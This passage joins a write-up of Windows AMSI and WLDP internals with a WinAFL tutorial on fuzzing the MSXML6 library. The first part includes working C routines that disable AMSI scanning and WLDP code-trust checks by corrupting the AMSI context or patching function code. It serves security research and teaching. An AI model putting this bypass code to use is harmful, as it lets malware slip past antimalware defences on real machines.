  PWCHAR       AppName;            // set by AmsiInitialize
  IAntimalware *Antimalware;       // set by AmsiInitialize
  DWORD        SessionCount;       // increased by AmsiOpenSession
} _HAMSICONTEXT, *_PHAMSICONTEXT;
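The Signature value is just the four ASCII characters of "AMSI" packed into a DWORD with the first character in the low byte. The short sketch below shows the packing; pack_fourcc and is_amsi_signature are hypothetical helper names, not part of amsi.dll.

```c
#include <stdint.h>

#define AMSI_SIGNATURE 0x49534D41u

/* Pack four ASCII characters into a 32-bit value, first character in
 * the least significant byte (how the bytes appear in memory on a
 * little-endian machine). */
uint32_t pack_fourcc(char a, char b, char c, char d)
{
    return  (uint32_t)(uint8_t)a
         | ((uint32_t)(uint8_t)b << 8)
         | ((uint32_t)(uint8_t)c << 16)
         | ((uint32_t)(uint8_t)d << 24);
}

/* Non-zero when the value matches the AMSI context signature. */
int is_amsi_signature(uint32_t signature)
{
    return signature == AMSI_SIGNATURE;
}
```

This is why a memory dump of a valid context starts with the readable bytes 41 4D 53 49.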

5. AMSI Initialization

appName points to a user-defined string in Unicode format while amsiContext points to a handle of type HAMSICONTEXT. AmsiInitialize returns S_OK if an AMSI context was successfully initialized. The following code is not a full implementation of the function, but should help you understand what happens internally.

HRESULT _AmsiInitialize(LPCWSTR appName, HAMSICONTEXT *amsiContext) {
    _HAMSICONTEXT *ctx;
    HRESULT       hr;
    int           nameLen;
    IClassFactory *clsFactory = NULL;
    
    // invalid arguments?
    if(appName == NULL || amsiContext == NULL) {
      return E_INVALIDARG;
    }
    
    // allocate memory for context
    ctx = (_HAMSICONTEXT*)CoTaskMemAlloc(sizeof(_HAMSICONTEXT));
    if(ctx == NULL) {
      return E_OUTOFMEMORY;
    }
    
    // initialize to zero
    ZeroMemory(ctx, sizeof(_HAMSICONTEXT));
    
    // set the signature to "AMSI"
    ctx->Signature = 0x49534D41;
    
    // allocate memory for the appName and copy to buffer
    // (appName is a wide string, so use the W variants explicitly)
    nameLen = (lstrlenW(appName) + 1) * sizeof(WCHAR);
    ctx->AppName = (PWCHAR)CoTaskMemAlloc(nameLen);
    
    if(ctx->AppName == NULL) {
      hr = E_OUTOFMEMORY;
    } else {
      // set the app name
      lstrcpyW(ctx->AppName, appName);
      
      // instantiate class factory
      hr = DllGetClassObject(
        CLSID_Antimalware, 
        IID_IClassFactory, 
        (LPVOID*)&clsFactory);
        
      if(hr == S_OK) {
        // instantiate Antimalware interface
        hr = clsFactory->CreateInstance(
          NULL,
          IID_IAntimalware, 
          (LPVOID*)&ctx->Antimalware);
        
        // free class factory
        clsFactory->Release();
        
        // save pointer to context
        *amsiContext = ctx;
      }
    }
    
    // if anything failed, free context
    if(hr != S_OK) {
      AmsiFreeContext(ctx);
    }
    return hr;
}

Memory is allocated on the heap for a HAMSICONTEXT structure and initialized using the appName, the AMSI signature (0x49534D41) and IAntimalware interface.

6. AMSI Scanning

The following code gives you a rough idea of what happens when the function is invoked. If the scan is successful, the result returned will be S_OK and the AMSI_RESULT should be inspected to determine if the buffer contains unwanted software.

HRESULT _AmsiScanBuffer(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *amsiResult)
{
    _HAMSICONTEXT *ctx = (_HAMSICONTEXT*)amsiContext;
    
    // validate arguments
    if(buffer           == NULL       ||
       length           == 0          ||
       amsiResult       == NULL       ||
       ctx              == NULL       ||
       ctx->Signature   != 0x49534D41 ||
       ctx->AppName     == NULL       ||
       ctx->Antimalware == NULL)
    {
      return E_INVALIDARG;
    }
    
    // scan buffer
    return ctx->Antimalware->Scan(
      ctx->Antimalware,     // rcx = this
      &CAmsiBufferStream,   // rdx = IAmsiBufferStream interface
      amsiResult,           // r8  = AMSI_RESULT
      NULL,                 // r9  = IAntimalwareProvider
      amsiContext,          // HAMSICONTEXT
      CAmsiBufferStream,
      buffer,
      length, 
      contentName,
      amsiSession);
}

Note how arguments are validated. This is one of the many ways AmsiScanBuffer can be forced to fail and return E_INVALIDARG.
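To make the failure mode concrete, here is a minimal Python model of the argument checks above. It is only a sketch: the AmsiContext class, its field names and the scan_buffer function are hypothetical stand-ins for the native structure and AmsiScanBuffer, and the scan itself is replaced by a placeholder that returns S_OK.

```python
from dataclasses import dataclass
from typing import Optional

S_OK = 0x00000000
E_INVALIDARG = 0x80070057
AMSI_SIGNATURE = 0x49534D41  # "AMSI" as a little-endian DWORD


@dataclass
class AmsiContext:
    """Hypothetical stand-in for the native _HAMSICONTEXT structure."""
    signature: int = AMSI_SIGNATURE
    app_name: Optional[str] = "DotNet"
    antimalware: Optional[str] = "IAntimalware placeholder"


def scan_buffer(ctx, buffer):
    """Model of the argument validation only; no real scanning happens."""
    if (not buffer
            or ctx is None
            or ctx.signature != AMSI_SIGNATURE
            or ctx.app_name is None
            or ctx.antimalware is None):
        return E_INVALIDARG
    return S_OK  # placeholder for the provider's Scan call


ctx = AmsiContext()
print(hex(scan_buffer(ctx, b"payload")))  # valid context
ctx.signature += 1                         # corrupt a single field
print(hex(scan_buffer(ctx, b"payload")))  # now rejected
```

Changing any one of the validated fields is enough to make every later call fail before a provider is consulted.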

7. CLR Implementation of AMSI

CLR uses a private function called AmsiScan to detect unwanted software passed via a Load method. Detection can result in termination of a .NET process, but not necessarily of an unmanaged process using the CLR hosting interfaces. The following code gives you a rough idea of how CLR implements AMSI.

AmsiScanBuffer_t _AmsiScanBuffer;
AmsiInitialize_t _AmsiInitialize;
HAMSICONTEXT     g_amsiContext;

VOID AmsiScan(PVOID buffer, ULONG length) {
    HMODULE          amsi;
    HAMSICONTEXT     ctx;
    AMSI_RESULT      amsiResult;
    HRESULT          hr;
    
    // if global context not initialized
    if(g_amsiContext == NULL) {
      // load AMSI.dll
      amsi = LoadLibraryEx(
        L"amsi.dll", 
        NULL, 
        LOAD_LIBRARY_SEARCH_SYSTEM32);
        
      if(amsi != NULL) {
        // resolve address of init function
        _AmsiInitialize = 
          (AmsiInitialize_t)GetProcAddress(amsi, "AmsiInitialize");
        
        // resolve address of scanning function
        _AmsiScanBuffer =
          (AmsiScanBuffer_t)GetProcAddress(amsi, "AmsiScanBuffer");
        
        // failed to resolve either? exit scan
        if(_AmsiInitialize == NULL ||
           _AmsiScanBuffer == NULL) return;
           
        hr = _AmsiInitialize(L"DotNet", &ctx);
        
        if(hr == S_OK) {
          // update global variable
          g_amsiContext = ctx;
        }
      }
    }
    if(g_amsiContext != NULL) {
      // scan buffer
      hr = _AmsiScanBuffer(
        g_amsiContext,
        buffer,
        length,
        0,
        0,        
        &amsiResult);
        
      if(hr == S_OK) {
        // if malware was detected or it's blocked by admin
        if(AmsiResultIsMalware(amsiResult) ||
           AmsiResultIsBlockedByAdmin(amsiResult))
        {
          // "Operation did not complete successfully because "
          // "the file contains a virus or potentially unwanted" 
          // software.
          GetHRMsg(ERROR_VIRUS_INFECTED, &error_string, 0);
          ThrowHR(COR_E_BADIMAGEFORMAT, &error_string);          
        }           
      }
    }
}

When AmsiScan is called for the first time, it invokes AmsiInitialize which, if successful, returns a pointer to an AMSI context. The pointer is then saved to a global variable called g_amsiContext to be used for later scans. If the buffer does contain harmful code, ThrowHR is called with COR_E_BADIMAGEFORMAT and ERROR_VIRUS_INFECTED as the secondary error. The problem with this code is that AmsiScanBuffer will return E_INVALIDARG if the AMSI context is corrupt, and AmsiScan doesn’t bother to investigate why.
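The fail-open control flow can be modelled in a few lines of Python. This is a sketch, not CLR code: amsi_scan, load_allowed, the two scanner callables and the DetectionError exception are hypothetical names, and only the malware check is modelled (the blocked-by-admin range is left out for brevity).

```python
S_OK = 0x00000000
E_INVALIDARG = 0x80070057
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_DETECTED = 32768


class DetectionError(Exception):
    """Hypothetical stand-in for the exception raised through ThrowHR."""


def amsi_scan(scan_buffer, data):
    """Mirror the control flow of AmsiScan: only act when hr == S_OK."""
    hr, result = scan_buffer(data)
    if hr == S_OK and result >= AMSI_RESULT_DETECTED:
        raise DetectionError("content blocked")
    # Any failure HRESULT falls through silently, so the load continues.
    return hr


def load_allowed(scan_buffer, data):
    """Return True if the (modelled) assembly load would go ahead."""
    try:
        amsi_scan(scan_buffer, data)
        return True
    except DetectionError:
        return False


def healthy_scanner(data):
    # A provider that flags the payload.
    return S_OK, AMSI_RESULT_DETECTED


def corrupted_context_scanner(data):
    # Argument validation fails before any provider is consulted.
    return E_INVALIDARG, AMSI_RESULT_CLEAN


print(load_allowed(healthy_scanner, b"payload"))
print(load_allowed(corrupted_context_scanner, b"payload"))
```

With the healthy scanner the load is refused, while the failing scanner lets the same payload through because nothing checks for an error HRESULT.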

8. AMSI Bypass A (Patching Data)

Matt Graeber provided a PoC that corrupts the context CLR!g_amsiContext points to, thus causing AmsiScanBuffer to return E_INVALIDARG. As you can see from the CLR implementation, this works because the result of CLR!AmsiScan is never validated for success or failure. The assumption is that it will simply throw an error and terminate the host application upon any attempt to load unwanted software. However, an unmanaged application hosting a .NET assembly is likely to handle any C++ exception. Windows Defender would still log the detection of harmful code, but the unmanaged host application would in some cases continue to run. To disable AMSI via g_amsiContext, one can either search through the heap memory pointed to by PEB.ProcessHeap or through each pointer found in the virtual address space of the .data segment. The following code demonstrates the latter approach. This only works _after_ CLR has called AmsiScan.

BOOL DisableAMSI(VOID) {
    LPVOID                   hCLR;
    BOOL                     disabled = FALSE;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, j, res;
    PBYTE                    ds;
    MEMORY_BASIC_INFORMATION mbi;
    _PHAMSICONTEXT           ctx;
    
    hCLR = GetModuleHandleA("CLR");
    
    if(hCLR != NULL) {
      dos = (PIMAGE_DOS_HEADER)hCLR;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, hCLR, dos->e_lfanew);  
      sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
             nt->FileHeader.SizeOfOptionalHeader);
             
      // scan all writeable segments while disabled == FALSE
      for(i = 0; 
          i < nt->FileHeader.NumberOfSections && !disabled; 
          i++) 
      {
        // if this section is writeable, assume it's data
        if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
          // scan section for pointers to the heap
          ds = RVA2VA (PBYTE, hCLR, sh[i].VirtualAddress);
           
          for(j = 0; 
              j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR); 
              j += sizeof(ULONG_PTR)) 
          {
            // get pointer
            ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
            // query if the pointer
            res = VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
            if(res != sizeof(mbi)) continue;
            
            // if it's a pointer to heap or stack
            if ((mbi.State   == MEM_COMMIT    ) &&
                (mbi.Type    == MEM_PRIVATE   ) && 
                (mbi.Protect == PAGE_READWRITE))
            {
              ctx = (_PHAMSICONTEXT)ptr;
              // check if it contains the signature 
              if(ctx->Signature == 0x49534D41) {
                // corrupt it
                ctx->Signature++;
                disabled = TRUE;
                break;
              }
            }
          }
        }
      }
    }
    return disabled;
}

9. AMSI Bypass B (Patching Code 1)

CyberArk suggest patching AmsiScanBuffer with two instructions: xor edi, edi followed by nop. If you wanted to hook the function, using a Length Disassembler Engine (LDE) might be helpful for calculating the correct number of prolog bytes to save before overwriting them with a jump to an alternate function. Since the AMSI context passed into this function is validated and one of the tests requires the Signature to be “AMSI”, you might locate that immediate value and simply change it to something else. In the following example, we’re corrupting the signature in code rather than in the context/data as demonstrated by Matt Graeber.

BOOL DisableAMSI(VOID) {
    HMODULE        dll;
    PBYTE          cs;
    DWORD          i, op, t;
    BOOL           disabled = FALSE;
    _PHAMSICONTEXT ctx;
    
    // load AMSI library
    dll = LoadLibraryExA(
      "amsi", NULL, 
      LOAD_LIBRARY_SEARCH_SYSTEM32);
      
    if(dll == NULL) {
      return FALSE;
    }
    // resolve address of function to patch
    cs = (PBYTE)GetProcAddress(dll, "AmsiScanBuffer");
    
    if(cs == NULL) {
      return FALSE;
    }
    // scan for signature (unbounded: assumes the immediate exists)
    for(i=0;;i++) {
      ctx = (_PHAMSICONTEXT)&cs[i];
      // is it "AMSI"?
      if(ctx->Signature == 0x49534D41) {
        // set page protection for write access at the match itself,
        // which may sit on a different page than the entry point
        if(!VirtualProtect(&cs[i], sizeof(DWORD), 
          PAGE_EXECUTE_READWRITE, &op)) break;
          
        // change signature
        ctx->Signature++;
        
        // set page back to original protection
        VirtualProtect(&cs[i], sizeof(DWORD), op, &t);
        disabled = TRUE;
        break;
      }
    }
    return disabled;
}

10. AMSI Bypass C (Patching Code 2)

Tal Liberman suggests overwriting the prolog bytes of AmsiScanBuffer to return 1. The following code also overwrites that function so that it returns AMSI_RESULT_CLEAN and S_OK for every buffer scanned by CLR.

// fake function that always returns S_OK and AMSI_RESULT_CLEAN
static HRESULT WINAPI AmsiScanBufferStub(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

static VOID AmsiScanBufferStubEnd(VOID) {}

BOOL DisableAMSI(VOID) {
    BOOL    disabled = FALSE;
    HMODULE amsi;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load amsi
    amsi = LoadLibrary("amsi");
    
    if(amsi != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(amsi, "AmsiScanBuffer");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)AmsiScanBufferStubEnd -
          (ULONG_PTR)AmsiScanBufferStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with code stub
          memcpy(cs, &AmsiScanBufferStub, len);
          
          disabled = TRUE;
            
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return disabled;
}

After the patch is applied, we see unwanted software is flagged as safe.

11. WLDP Example in C

The following function demonstrates how to query the trust of dynamic code in-memory using Windows Lockdown Policy.

BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
    HMODULE                     wldp;
    HANDLE                      file, map, mem;
    HRESULT                     hr = -1;
    DWORD                       low, high;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    if(wldp == NULL) {
      printf("Unable to load WLDP.dll.\n");
      return FALSE;
    }
    _WldpQueryDynamicCodeTrust = 
      (WldpQueryDynamicCodeTrust_t)
      GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    
    // return FALSE on failure
    if(_WldpQueryDynamicCodeTrust == NULL) {
      printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
      return FALSE;
    }
    
    // open file for reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      low = GetFileSize(file, &high);
      if(low != 0) {
        // create mapping
        map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
          if(mem != NULL) {
            // verify signature
            hr = _WldpQueryDynamicCodeTrust(0, mem, low);              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return hr == S_OK;
}

12. WLDP Bypass A (Patching Code 1)

This bypass overwrites the function with a code stub that always returns S_OK.

// fake function that always returns S_OK
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize)
{
    return S_OK;
}

static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}

static BOOL PatchWldp(VOID) {
    BOOL    patched = FALSE;
    HMODULE wldp;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    
    if(wldp != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
          (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with stub
          memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
        
          patched = TRUE;
        
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return patched;
}

Although the methods described here are easy to detect, they remain effective against the latest release of DotNet framework on Windows 10. So long as it’s possible to patch data or code used by AMSI to detect harmful code, the potential to bypass it will always exist.

Fuzzing the MSXML6 library with WinAFL

Original text by symeonp

Introduction

In this blog post, I’ll write about how I tried to fuzz the MSXML library using the WinAFL fuzzer.

If you haven’t played around with WinAFL, it’s a massive fuzzer created by Ivan Fratric and based on lcamtuf’s AFL. It uses DynamoRIO to measure code coverage and the Windows API for memory and process creation. Axel Souchet has been actively contributing features such as corpus minimization, the latest AFL stable builds, persistent execution mode (which I will cover in the next blog post) and, finally, the afl-tmin tool.

We will start by creating a test harness which will allow us to fuzz some parsing functionality within the library, calculate the coverage, minimise the test cases, and finish by kicking off the fuzzer and triaging the findings. Lastly, thanks to Mitja Kolsek from 0patch for providing the patch; we will see how one can use 0patch to patch this issue!

Using the above steps, I’ve managed to find a NULL pointer dereference in the msxml6!DTD::findEntityGeneral function, which I reported to Microsoft; the report got rejected as this is not a security issue. Fair enough, indeed the crash is crap, yet hopefully somebody might find the techniques I followed interesting!

The Harness

While doing some research I ended up on this page, where Microsoft has kindly provided sample C++ code which allows us to feed in some XML files and validate their structure. I am going to use Visual Studio 2015 to build the following program, but before I do that I am going to modify it slightly and use Ivan’s charToWChar method so that it accepts a file as an argument:

// xmlvalidate_fuzz.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#import <msxml6.dll>
extern "C" __declspec(dllexport)  int main(int argc, char** argv);

// Macro that calls a COM method returning HRESULT value.
#define CHK_HR(stmt)        do { hr=(stmt); if (FAILED(hr)) goto CleanUp; } while(0)

void dump_com_error(_com_error &e)
{
    _bstr_t bstrSource(e.Source());
    _bstr_t bstrDescription(e.Description());

    printf("Error\n");
    printf("\a\tCode = %08lx\n", e.Error());
    printf("\a\tCode meaning = %s", e.ErrorMessage());
    printf("\a\tSource = %s\n", (LPCSTR)bstrSource);
    printf("\a\tDescription = %s\n", (LPCSTR)bstrDescription);
}

_bstr_t validateFile(_bstr_t bstrFile)
{
    // Initialize objects and variables.
    MSXML2::IXMLDOMDocument2Ptr pXMLDoc;
    MSXML2::IXMLDOMParseErrorPtr pError;
    _bstr_t bstrResult = L"";
    HRESULT hr = S_OK;

    // Create a DOMDocument and set its properties.
    CHK_HR(pXMLDoc.CreateInstance(__uuidof(MSXML2::DOMDocument60), NULL, CLSCTX_INPROC_SERVER));

    pXMLDoc->async = VARIANT_FALSE;
    pXMLDoc->validateOnParse = VARIANT_TRUE;
    pXMLDoc->resolveExternals = VARIANT_TRUE;

    // Load and validate the specified file into the DOM.
    // And return validation results in message to the user.
    if (pXMLDoc->load(bstrFile) != VARIANT_TRUE)
    {
        pError = pXMLDoc->parseError;

        bstrResult = _bstr_t(L"Validation failed on ") + bstrFile +
            _bstr_t(L"\n=====================") +
            _bstr_t(L"\nReason: ") + _bstr_t(pError->Getreason()) +
            _bstr_t(L"\nSource: ") + _bstr_t(pError->GetsrcText()) +
            _bstr_t(L"\nLine: ") + _bstr_t(pError->Getline()) +
            _bstr_t(L"\n");
    }
    else
    {
        bstrResult = _bstr_t(L"Validation succeeded for ") + bstrFile +
            _bstr_t(L"\n======================\n") +
            _bstr_t(pXMLDoc->xml) + _bstr_t(L"\n");
    }

CleanUp:
    return bstrResult;
}

wchar_t* charToWChar(const char* text)
{
    size_t size = strlen(text) + 1;
    wchar_t* wa = new wchar_t[size];
    mbstowcs(wa, text, size);
    return wa;
}

int main(int argc, char** argv)
{
    if (argc < 2) {
        printf("Usage: %s <xml file>\n", argv[0]);
        return 0;
    }

    HRESULT hr = CoInitialize(NULL);
    if (SUCCEEDED(hr))
    {
        try
        {
            _bstr_t bstrOutput = validateFile(charToWChar(argv[1]));
            MessageBoxW(NULL, bstrOutput, L"noNamespace", MB_OK);
        }
        catch (_com_error &e)
        {
            dump_com_error(e);
        }
        CoUninitialize();
    }

    return 0;

}

Notice also the following snippet: extern "C" __declspec(dllexport) int main(int argc, char** argv);

Essentially, this allows us to use the target_method argument, with which DynamoRIO will try to retrieve the address for a given symbol name, as seen here.

I could use the offsets method as per the README, but due to ASLR and all that stuff, and since we want to scale the fuzzing a bit, spread the binary to many virtual machines and use the same commands to fuzz it, a symbol name is the better option. The extern "C" directive will unmangle the function name and will make it look prettier.

To confirm that indeed DynamoRIO can use this method the following command can be used:

dumpbin /EXPORTS xmlvalidate_fuzz.exe

Viewing the exported functions.

Now let’s quickly run the binary and observe the output. You should get the following output:

Output from the xmlvalidate binary.

Code Coverage

WinAFL

Since the library is closed source, we will be using DynamoRIO’s code coverage library feature via the WinAFL:

C:\DRIO\bin32\drrun.exe -c winafl.dll -debug -coverage_module msxml6.dll -target_module xmlvalidate.exe -target_method main -fuzz_iterations 10 -nargs 2 -- C:\xml_fuzz_initial\xmlvalidate.exe C:\xml_fuzz_initial\nn-valid.xml

WinAFL will start executing the binary ten times. Once this is done, navigate back to the winafl folder and check the log file:

Checking the coverage within WinAFL.

From the output we can see that everything appears to be running normally! On the right side of the file, the dots depict the coverage of the DLL; if you scroll down you’ll see that we did hit many functions, as we are getting more dots throughout the whole file. That’s a very good indication that we are hitting a lot of code and that we are properly targeting the MSXML6 library.

Lighthouse — Code Coverage Explorer for IDA Pro

This plugin will help us better understand which functions we are hitting and give a nice overview of the coverage using IDA. It’s an excellent plugin with very good documentation and has been developed by Markus Gaasedelen (@gaasedelen). Make sure to download the latest DynamoRIO version 7, and install it as per the instructions here. Luckily, we do have two sample test cases from the documentation, one valid and one invalid. Let’s feed the valid one and observe the coverage. To do that, run the following command:

C:\DRIO7\bin64\drrun.exe -t drcov -- xmlvalidate.exe nn-valid.xml

Next, fire up IDA, drag in msxml6.dll and make sure to fetch the symbols! Now, check if a .log file has been created and open it in IDA from the File -> Load File -> Code Coverage File(s) menu. Once the coverage file is loaded, it will highlight all the functions that your test case hit.

Case minimisation

Now it’s time to grab some XML files (as small as possible). I’ve used a slightly hacked version of joxean’s find_samples.py script. Once you get a few test cases let’s minimise our initial seed files. This can be done using the following command:

python winafl-cmin.py --working-dir C:\winafl\bin32 -D C:\DRIO\bin32 -t 100000 -i C:\xml_fuzz\samples -o C:\minset_xml -coverage_module msxml6.dll -target_module xmlvalidate.exe -target_method fuzzme -nargs 1 -- C:\xml_fuzz\xmlvalidate.exe @@

You might see the following output:

corpus minimization tool for WinAFL by <0vercl0k@tuxfamily.org> 
Based on WinAFL by <ifratric@google.com> 
Based on AFL by <lcamtuf@google.com> 
[+] CWD changed to C:\winafl\bin32. 
[*] Testing the target binary... 
[!] Dry-run failed, 2 executions resulted differently: 
Tuples matching? False 
Return codes matching? True

I am not quite sure, but I think that the winafl-cmin.py script expects the initial seed files to lead to the same code path; that is, we have to run the script once for the valid cases and once for the invalid ones. I might be wrong though, and maybe there’s a bug, in which case I need to ping Axel.

Let’s identify the ‘good’ and the ‘bad’ XML test cases using this bash script:

$ for file in *; do printf '==== FILE: %s =====\n' "$file"; /cygdrive/c/xml_fuzz/xmlvalidate.exe "$file"; sleep 1; done

The following screenshot depicts my results:

Looping through the test cases with Cygwin
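If Cygwin is not at hand, a rough first pass over the corpus can also be made without the harness. The sketch below swaps in Python’s built-in XML parser, which is a substitution and not what the harness does: it only checks well-formedness and will not agree with MSXML6 validation in every case, so treat the split as a starting point. The is_well_formed and split_seeds helpers are hypothetical.

```python
import os
import xml.etree.ElementTree as ET


def is_well_formed(data):
    """Return True if the built-in parser accepts the document."""
    try:
        ET.fromstring(data)
        return True
    except (ET.ParseError, LookupError, ValueError):
        # Malformed markup, unknown encodings and similar problems.
        return False


def split_seeds(directory):
    """Group the files in a directory into (good, bad) lists of names."""
    good, bad = [], []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as handle:
            data = handle.read()
        (good if is_well_formed(data) else bad).append(name)
    return good, bad
```

Calling split_seeds on the samples directory returns the two lists of file names, which can then be copied into separate input folders for two winafl-cmin.py runs.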

Feel free to experiment a bit and see which files are causing this issue; your mileage may vary. Once you are set, run the above command again and hopefully you’ll get the following result:

Minimising our initial seed files.

So look at that! The initial campaign included 76 cases, which the minimisation narrowed down to 26. 
Thank you Axel!

With the minimised test cases let’s code a python script that will automate all the code coverage:

import os
import subprocess

DRRUN = "C:\\DRIO7\\bin32\\drrun.exe"
TARGET = "C:\\xml_fuzz\\xmlvalidate.exe"

# collect every .xml test case below the current directory
testcases = []
for root, dirs, files in os.walk(".", topdown=False):
    for name in files:
        if name.endswith(".xml"):
            testcase = os.path.abspath(os.path.join(root, name))
            testcases.append(testcase)

# run each test case under drcov to produce one coverage log per file
for testcase in testcases:
    print("[*] Running DynamoRIO for testcase: %s" % testcase)
    subprocess.call([DRRUN, "-t", "drcov", "--", TARGET, testcase])

The above script produced the following output for my case:

Coverage files produced by the Lighthouse plugin.

As previously, using IDA open all those .log files under File -> Load File -> Code Coverage File(s) menu.

Code coverage using the Lighthouse plugin and IDA Pro.

Interestingly enough, notice how many parse functions do exist, and if you navigate around the coverage you’ll see that we’ve managed to hit a decent amount of interesting code.

Since we do have some decent coverage, let’s move on and finally fuzz it!

All I do is fuzz, fuzz, fuzz

Let’s kick off the fuzzer:

afl-fuzz.exe -i C:\minset_xml -o C:\xml_results -D C:\DRIO\bin32\ -t 20000 -- -coverage_module MSXML6.dll -target_module xmlvalidate.exe -target_method main -nargs 2 -- C:\xml_fuzz\xmlvalidate.exe @@

Running the above yields the following output:

WinAFL running with a slow speed.

As you can see, the initial code does the job; however, the speed is very slow. At three executions per second it will take a long time to give some proper results. Interestingly enough, I’ve had luck in the past with that kind of speed (using python and radamsa prior to the afl/winafl era) and had success in finding bugs within three days of fuzzing!

Let’s try our best though and get rid of the part that slows down the fuzzing. If you’ve done some Windows programming you know that the following line initialises the COM library for the calling thread, which could be the bottleneck behind the slow speed:

HRESULT hr = CoInitialize(NULL);

This line is probably a major issue, so let’s refactor the code: we are going to create a fuzzme method which receives the filename as an argument and sits outside the COM initialisation call. The refactored code should look like this:

--- cut ---

extern "C" __declspec(dllexport) _bstr_t fuzzme(wchar_t* filename);

_bstr_t fuzzme(wchar_t* filename)
{
    _bstr_t bstrOutput = validateFile(filename);
    //bstrOutput += validateFile(L"nn-notValid.xml");
    //MessageBoxW(NULL, bstrOutput, L"noNamespace", MB_OK);
    return bstrOutput;

}
int main(int argc, char** argv)
{
    if (argc < 2) {
        printf("Usage: %s <xml file>\n", argv[0]);
        return 0;
    }

    HRESULT hr = CoInitialize(NULL);
    if (SUCCEEDED(hr))
    {
        try
        {
            _bstr_t bstrOutput = fuzzme(charToWChar(argv[1]));
        }
        catch (_com_error &e)
        {
            dump_com_error(e);
        }
        CoUninitialize();
    }
    return 0;
}
--- cut ---
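Why the choice of target function matters can be shown with a toy model. The Python sketch below is not WinAFL; run_campaign, expensive_init, main_target and the counters are hypothetical and only count how often the costly setup runs when the loop covers the whole of main versus fuzzme alone.

```python
calls = {"init": 0, "parse": 0}


def expensive_init():
    # Stands in for CoInitialize and other one-off process setup.
    calls["init"] += 1


def fuzzme(data):
    # Stands in for validateFile: the only work we want repeated.
    calls["parse"] += 1


def main_target(data):
    # Target is main: the setup is repeated on every iteration.
    expensive_init()
    fuzzme(data)


def run_campaign(target, iterations, init_once=False):
    """Call the target repeatedly, the way an in-process loop would."""
    calls["init"] = calls["parse"] = 0
    if init_once:
        expensive_init()  # runs once, before the loop is entered
    for _ in range(iterations):
        target(b"<a/>")
    return dict(calls)


print(run_campaign(main_target, 1000))
print(run_campaign(fuzzme, 1000, init_once=True))
```

In the second run the setup cost is paid once and every further iteration only exercises the parsing code, which is the effect the refactoring is after.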

You can grab the refactored version here. With the refactored binary, let’s run the fuzzer one more time and see if we were right. This time, we will pass fuzzme as the target_method instead of main, and use only one argument, which is the filename. While we are here, let’s use lcamtuf’s xml.dict from here.

afl-fuzz.exe -i C:\minset_xml -o C:\xml_results -D C:\DRIO\bin32\ -t 20000 -x xml.dict -- -coverage_module MSXML6.dll -target_module xmlvalidate.exe -target_method fuzzme -nargs 1 -- C:\xml_fuzz\xmlvalidate.exe @@

Once you’ve run that, here’s the output within a few seconds of fuzzing on a VMWare instance:

WinAFL running with a massive speed.

Brilliant! That’s much much better, now let it run and wait for crashes! 

The findings — Crash triage/analysis

Generally, I’ve tried to fuzz this binary with different test cases; unfortunately, I kept getting the same NULL pointer dereference bug. The following screenshot depicts the findings after a fuzzing campaign of roughly 12 days:

Fuzzing results after 12 days.

Notice that a total of 33 million executions were performed and 26 unique crashes were discovered!

In order to triage these findings, I’ve used the BugId tool from SkyLined. It’s an excellent tool which will give you a detailed report regarding the crash and its exploitability.

Here’s my python code for that:

import sys
import os


sys.path.append("C:\\BugId")

testcases = []
for root, dirs, files in os.walk(".\\fuzzer01\\crashes", topdown=False):
    for name in files:
        if name.endswith("00"):
            testcase =  os.path.abspath(os.path.join(root, name))
            testcases.append(testcase)

for testcase in testcases:
    print("[*] Gonna run: %s" % testcase)
